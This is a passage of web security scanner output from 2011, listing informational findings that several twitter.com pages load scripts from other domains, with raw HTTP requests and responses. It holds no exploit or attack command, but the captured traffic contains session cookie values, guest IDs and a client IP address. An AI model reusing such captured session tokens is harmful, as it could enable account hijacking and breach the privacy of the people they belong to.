Content-Length: 9562
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.281. http://twitter.com/account/resend_password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664210-96438-54944
ETag: "fb1d5f1edad456678d1c90468c2ef216"
Last-Modified: Wed, 02 Feb 2011 16:30:11 GMT
X-Runtime: 0.03202
Content-Type: text/html; charset=utf-8
Content-Length: 9745
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.282. http://twitter.com/arnui previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/arnui

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /arnui HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570798-49120-27741
ETag: "c59d150314d7d7cff9932be20e7dc3ef"
Last-Modified: Tue, 01 Feb 2011 14:33:18 GMT
X-Runtime: 0.01459
Content-Type: text/html; charset=utf-8
Content-Length: 51947
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570798704449; path=/; expires=Tue, 08-Feb-11 14:33:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079871539029; path=/; expires=Thu, 03 Mar 2011 14:33:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTQ5N2RiZWUxOWRkZWQ0YmQ3ZTEyMGFjMzE2NDc0Mzg4Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIflKk4S0B--47bfbc59ed0e9d5c07285a54ffa9822cfa655e62; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.283. http://twitter.com/arnui previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/arnui

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /arnui HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664182-11957-34974
ETag: "c7fa6ce8747a3ca36533923e4727cf72"
Last-Modified: Wed, 02 Feb 2011 16:29:42 GMT
X-Runtime: 0.01297
Content-Type: text/html; charset=utf-8
Content-Length: 53579
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.284. http://twitter.com/ashleytisdale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ashleytisdale

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664278-24854-30849
ETag: "56d73abc9fb34be8c0c69741ec8b2d21"
Last-Modified: Wed, 02 Feb 2011 16:31:18 GMT
X-Runtime: 0.01148
Content-Type: text/html; charset=utf-8
Content-Length: 50085
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.285. http://twitter.com/best_golf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/best_golf

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /best_golf HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570772-68378-30078
ETag: "942af770678a66a93ab8ed20fc7fbe09"
Last-Modified: Tue, 01 Feb 2011 14:32:52 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Content-Length: 49487
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570769287275; path=/; expires=Tue, 08-Feb-11 14:32:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=12965707721577760; path=/; expires=Thu, 03 Mar 2011 14:32:52 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTg0NDU2NzMyMGRkNmVhMmVmM2E3OTY3MzEzNDRhNmY3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIv%252Bqj4S0B--d65ee02c97fc9e9f3fae0cf9021c58b815ea69b0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.286. http://twitter.com/best_golf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/best_golf

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /best_golf HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:27:58 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664078-70228-2918
ETag: "82d6fadfbb7affb1eeb224f798082521"
Last-Modified: Wed, 02 Feb 2011 16:27:58 GMT
X-Runtime: 0.01961
Content-Type: text/html; charset=utf-8
Content-Length: 49508
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.287. http://twitter.com/buyantsogtoo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/buyantsogtoo

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /buyantsogtoo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664187-9529-7575
ETag: "6d9721af0c8a5648baaa8ef08e498f28"
Last-Modified: Wed, 02 Feb 2011 16:29:47 GMT
X-Runtime: 0.01130
Content-Type: text/html; charset=utf-8
Content-Length: 52211
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
